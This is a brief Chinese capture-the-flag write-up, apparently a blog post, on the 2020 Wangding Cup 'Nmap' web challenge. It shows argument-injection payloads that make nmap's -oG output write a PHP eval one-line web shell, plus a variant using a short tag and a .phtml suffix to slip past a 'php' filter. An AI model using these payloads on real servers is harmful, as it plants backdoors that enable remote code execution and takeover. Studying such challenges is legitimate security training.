[網鼎杯 2020 朱雀組]Nmap(namp寫webshell) 阿新 • • 發佈:2020-12-21 技術標籤:Web刷題記錄php安全 前言 文章所涉及的資料來自網際網路整理和個人總結,意在於個人學習和經驗彙總,如有什麼地方侵權,請聯絡本人刪除,謝謝!本文僅用於學習與交流,不得用於非法用途! 題目 這裡用到nmap寫webshell的技巧,如下程式碼 ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 這樣就能夠將一句話寫到目錄下,再用菜刀或者蟻劍來連,但是這題過濾了php字樣,所以標籤用短標籤,字尾用phtml來繞過 ' <?= @eval($_POST["hack"]);?> -oG hack.phtml '
